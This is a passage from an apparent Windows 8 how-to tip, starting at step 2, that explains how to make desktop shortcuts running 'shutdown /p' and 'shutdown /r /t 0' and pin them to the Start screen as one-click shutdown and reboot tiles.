2. Right-click in any open spot on the desktop, then choose New, Shortcut.

3. We’re going to make a Shutdown shortcut, so in the location field, type shutdown /p and then click Next.

4. Choose a different name for the shortcut if you want, or leave it as “shutdown,” then click Finish.

5. Right-click the new shortcut and choose Pin to Start.

Presto! You’re done. The next time you return to the Start screen (aka Metro), you should see a Shutdown tile. One click or tap and your machine should immediately shut down.

You can also use this method to create a reboot tile. Just substitute the following text in step 3: shutdown /r /t 0. (That’s a zero at the end, and you shouldn’t include the period after it.)

Note that using the reboot tile will immediately reboot Windows, with no second-chance warning.